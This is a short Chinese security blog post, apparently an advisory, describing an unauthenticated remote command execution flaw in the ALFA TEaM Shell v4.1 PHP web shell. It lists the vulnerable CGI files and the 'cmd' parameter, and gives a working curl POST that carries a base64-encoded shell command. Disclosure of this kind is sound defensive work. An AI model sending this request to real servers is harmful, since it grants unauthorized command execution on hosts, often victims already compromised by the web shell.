Loading [MathJax]/jax/input/TeX/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >反制恶意软件ALFA TEAM SHELL TESLA 之 RCE

反制恶意软件ALFA TEAM SHELL TESLA 之 RCE

原创
作者头像
Khan安全团队
发布于 2021-12-22 06:42:01
发布于 2021-12-22 06:42:01
9820
举报
文章被收录于专栏:Khan安全团队Khan安全团队
ALFA TEaM Shell ~ v4.1
ALFA TEaM Shell ~ v4.1

一个发布新版本 PHP web shell 的组织是ALFA TEaM,这是一个可疑的伊朗组织,该组织创建了ALFA TEaMShell等网络恶意软件,过去曾被APT 33等针对能源和航空航天行业的威胁行为者使用过在过去。如果您有兴趣,FireEye 已经记录了APT 33组战术详细分析

供应​​商主页:http://solevisible.com

软件链接:https://phpshells.com/alfa-tesla-v4-1-shell

版本:v4.1

测试:Windows 10 Enterprise x64,Linux

[关于-阿尔法团队壳牌特斯拉]:

它是黑客使用的最流行的 web shell 之一,他们用它来访问服务器端。

[易受攻击的文件]:

1 . perl.alfa

2 . bash.alfa

3 . py.alfa

[易受攻击的参数]:CMD

[描述]: #执行命令无需身份验证或登录web shell, To use,只找到一个易受攻击的文件,

Convert your commands to base64 and Submit your request using the CMD parameter and the POST method.

curl -d "cmd=bHMgLWxh" -X POST http://localhost/alfacgiapi/perl.alfa

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
Sednit组织最新研发的恶意软件组件
Sednit组织,也被称为APT28、Fancy Bear、Sofacy或STRONTIUM,从2004年起该组织一直活跃至今,而且只要该组织参与的网络攻击活动一般都会上报纸头条。在2019年8月20日,该组织又发动了一波新的网络攻击活动,而这一波攻击活动针对的也是Sednit组织的老“对象”:东欧和中亚国家的大使馆和外交部。
FB客服
2019/11/18
7900
隐秘 “网络幽灵”:全球活跃 APT 攻击组织揭秘
就在4月11日,特朗普政府高官称美方将对中方采取更多进攻性网络活动,可见当今,网络空间已成为国家间博弈的新战场,而高级持续性威胁(APT)组织犹如隐匿在暗处的 “幽灵部队”,是国家间彼此攻击的重要武器。这些组织通常具备强大的技术实力、充足的资源支持以及明确的战略目标,能够长期、隐蔽地对特定目标进行攻击,窃取敏感信息或破坏关键基础设施。
星尘安全
2025/04/14
1460
隐秘 “网络幽灵”:全球活跃 APT 攻击组织揭秘
揭秘全球最危险的11大网络间谍组织
几十年前,当黑客入侵刚刚出现的时候,其大多是网络“发烧友”的“杰作”,他们痴迷于学习有关计算机和网络的一切知识。现如今,民族国家支持的威胁行为者正在开发越来越复杂的网络间谍工具,而网络犯罪分子则针对包含《财富》500强企业、医院、政府机构以及金融机构等在内的一切事物实施攻击,赚得盆满钵满。
FB客服
2021/07/02
1.5K0
[AI安全论文] 21.S&P21 Survivalism经典离地攻击(Living-Off-The-Land)恶意软件系统分析
前一篇是RAID 2019的Android数据泄露分析的译文,是对真实移动设备用户网络流量的实证评估,预测用户兴趣点(POI)的位置。这篇文章将带来S&P21的离地攻击(Living-Off-The-Land)系统分析,这是一篇非常经典的论文,并且系统性分析文章是另一种讲故事的方式。一方面自己英文太差,只能通过最土的办法慢慢提升,另一方面是自己的个人学习笔记,并分享出来希望大家批评和指正。希望这篇文章对您有所帮助,这些大佬是真的值得我们去学习,献上小弟的膝盖~fighting!
Eastmount
2022/08/31
6910
伊组织对美发起新一轮攻击
研究人员近期发现了APT34利用新工具集进行的网络活动。根据此次发现的网络钓鱼文件,伊朗黑客组织将美国Westat员工或Westat提供服务的组织作为攻击目标。Westat是一家美国公司,为美国政府机构以及企业,基金会以及州和地方政府提供研究服务。
FB客服
2020/04/20
8640
比较全面的恶意软件分析资料与项目
这是在github上找到的做恶意软件分析的资料,已经非常全面了,希望对做恶意软件检测的同学有帮助。
七夜安全博客
2019/03/04
4.8K0
Emotet恶意软件回归、黑客入侵FBI电子邮件系统|11月16日全球网络安全热点
Emotet恶意软件过去被认为是传播最广泛的恶意软件,它使用垃圾邮件活动和恶意附件来分发恶意软件。Emotet会使用受感染的设备来执行其他垃圾邮件活动并安装其他有效负载,例如QakBot(Qbot)和Trickbot恶意软件。然后,这些有效载荷将用于向威胁参与者提供部署勒索软件的初始访问权限,包括Ryuk、Conti、ProLock、Egregor等。
腾讯安全
2021/11/16
7370
Emotet恶意软件回归、黑客入侵FBI电子邮件系统|11月16日全球网络安全热点
跨平台恶意软件Adwind卷土重来,这一次倒霉的是航空航天领域
网络犯罪分子其实都是机会主义者,随着各类操作系统的应用范围越来越广泛,他们也在不断地丰富自己的工具和技术。与此同时,为了尽可能地在网络犯罪活动中谋取更多的经济利益,犯罪分子们在选择受攻击目标时也呈现出一种多样化的趋势。这也是恶意软件的价值主张,现在越来越多的恶意软件已经实现了跨平台感染,如果能够配合一种专门的商业模式来向其他的坏人兜售这些恶意软件的话,那么这些恶意软件的影响范围还会进一步扩大。 今天的主角是Adwind/jRAT,趋势科技将其标识为JAVA_ADWIND。这是一款跨平台的远程访问木马(RAT
FB客服
2018/02/28
8430
跨平台恶意软件Adwind卷土重来,这一次倒霉的是航空航天领域
2017年中国网络安全报告
本报告涵盖恶意软件与恶意网址、移动安全、互联网安全、趋势展望等多个章节,从解各方面分析 2017 中国网络安全态势。 一、恶意软件与恶意网址 (一)恶意软件 1. 2017年病毒概述 (1)病毒疫情总体概述 2017年瑞星“云安全”系统共截获病毒样本总量5,003万个,病毒感染次数29.1亿次,病毒总体数量比2016年同期上涨15.62%。 报告期内,新增木马病毒占总体数量的51.83%,依然是第一大种类病毒。蠕虫病毒为第二大种类病毒,占总体数量的24.49%,第三大种类病毒为灰色软件病毒(垃圾软件、广告软
FB客服
2018/02/07
2.8K0
2017年中国网络安全报告
黑客在 Log4j 攻击中使用新的 PowerShell 后门
据观察,被认为是伊朗 APT35 国家支持组织(又名“迷人小猫”或“磷”)的一部分的黑客利用 Log4Shell 攻击来释放新的 PowerShell 后门。
Khan安全团队
2022/01/12
7.1K0
神秘APT组织锁定(IIS)Web服务器,擅长规避恶意软件检测
近日研究人员发现,在过去一年间,一个复杂的且极可能由国家民族支持的威胁行为者一直在利用面向公众的ASP.NET应用程序中的反序列漏洞来部署无文件恶意软件,从而危害一些主要的公共和私营组织。
FB客服
2021/08/24
1.8K0
12 个优化 Docker 镜像安全性的技巧
本文介绍了 12 个优化 Docker 镜像安全性的技巧。每个技巧都解释了底层的攻击载体,以及一个或多个缓解方法。这些技巧包括了避免泄露构建密钥、以非 root 用户身份运行,或如何确保使用最新的依赖和更新等。
深度学习与Python
2022/03/24
6620
[译] APT分析报告:03.OpBlueRaven揭露APT组织Fin7/Carbanak(上)Tirion恶意软件
这是作者新开的一个专栏,主要翻译国外知名的安全厂商APT报告文章,了解它们的安全技术,学习它们溯源APT组织的方法,希望对您有所帮助。前文分享了钓鱼邮件网址混淆URL逃避检测,这篇文章将介绍APT组织Fin7 / Carbanak的Tirion恶意软件,包括OpBlueRaven行动。
Eastmount
2021/12/03
4900
[译] APT分析报告:03.OpBlueRaven揭露APT组织Fin7/Carbanak(上)Tirion恶意软件
新型在野远控木马Woody RAT,针对俄罗斯航空航天组织
Malwarebytes 威胁情报团队发现了一种新的远控木马,命名为 Woody RAT,研究人员发现其在野已经存在至少一年。 攻击者最近利用 Follina 漏洞来针对俄罗斯的实体发起攻击,根据注册的虚假域名推测,攻击目标应该为名为 OAK 的俄罗斯航空航天与国防组织。 分发方式 Woody RAT 使用两种方式进行分发:压缩文件与利用 Follina 漏洞的 Office 文档文件。 早期的样本在 ZIP 文件中,伪装成俄罗斯特组织的文件。当 Follina 漏洞出现时,攻击者也利用其进行分发恶意软件
FB客服
2023/03/30
1K0
新型在野远控木马Woody RAT,针对俄罗斯航空航天组织
[译] APT分析报告:07.拉撒路(Lazarus)两款恶意软件分析
这是作者新开的一个专栏,主要翻译国外知名安全厂商的APT报告,了解它们的安全技术,学习它们溯源APT组织的方法,希望对您有所帮助。前文分享了Rampant Kitten攻击活动,包括Windows信息窃取程序、Android后门和电报网络钓鱼页面。这篇文章将介绍APT组织拉撒路(Lazarus)使用的两款恶意软件,并进行详细分析。个人感觉这篇文章应该是韩国或日本安全人员撰写,整体分析的深度距安全大厂(FireEye、卡巴斯基、360)的APT报告还有差距,但文章内容仍值得我们学习。
Eastmount
2021/12/03
1.5K0
[译] APT分析报告:07.拉撒路(Lazarus)两款恶意软件分析
APT15组织研究白皮书
Ke3chang组织也被称为APT15,该组织的攻击行为于2012年第一次被曝光,该组织当时利用远程后门攻击全世界的高价值目标。该组织活动最早可以追溯到2010年,在火眼2013年报告中显示该组织当时针对目标为欧洲外交组织。2012-2015年记录显示该组织攻击者更新了TidePool恶意软件,后来2016-2017年RoyalCLI和RoyalDNS等工具被一同发现用于攻击英国政府。2018年,Ke3chang组织使用新版Mirage RAT以及精简版的MirageFox等工具。我们一直在跟踪与该组织相关的恶意攻击行为,并有很多有价值的发现。
FB客服
2019/08/13
1.3K0
APT15组织研究白皮书
2018年上半年中国网络安全报告
2018年上半年瑞星“云安全”系统共截获病毒样本总量2,587万个,病毒感染次数7.82亿次。新增木马病毒占总体数量的62.83%,依然是第一大种类病毒。灰色软件病毒(垃圾软件、广告软件、黑客工具、恶意软件)为第二大种类病毒,占总体数量的17.72%,第三大种类病毒为病毒释放器,占总体数量的9.55%。
FB客服
2018/08/21
1K0
2018年上半年中国网络安全报告
I Am The King恶意软件家族分析
2020年10月1日,DHS CISA发布了SlothfulMedia恶意软件家族信息;2018年6月,研究人员基于未知家庭恶意软件样本中的字符串发,布了名为IAmTheKing家族的第一份报告。
FB客服
2020/11/06
2.2K0
I Am The King恶意软件家族分析
揭秘兵工厂:探索攻击者工具集和战术
网络安全已成为数字时代的重要组成部分。网络攻击的扩散对个人、组织和政府都构成了重大威胁。当我们在这个数字环境中前行时,了解网络对手不断演变的战术对我们的整体安全至关重要。
FB客服
2023/10/28
4280
揭秘兵工厂:探索攻击者工具集和战术
恶意软件分析101之文件类型与指纹识别
冰封三尺非一日之寒,本篇先交付恶意软件前置知识的文件类型与指纹识别,来帮助大家打基础。
FB客服
2021/08/24
1.3K0
推荐阅读
相关推荐
Sednit组织最新研发的恶意软件组件
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档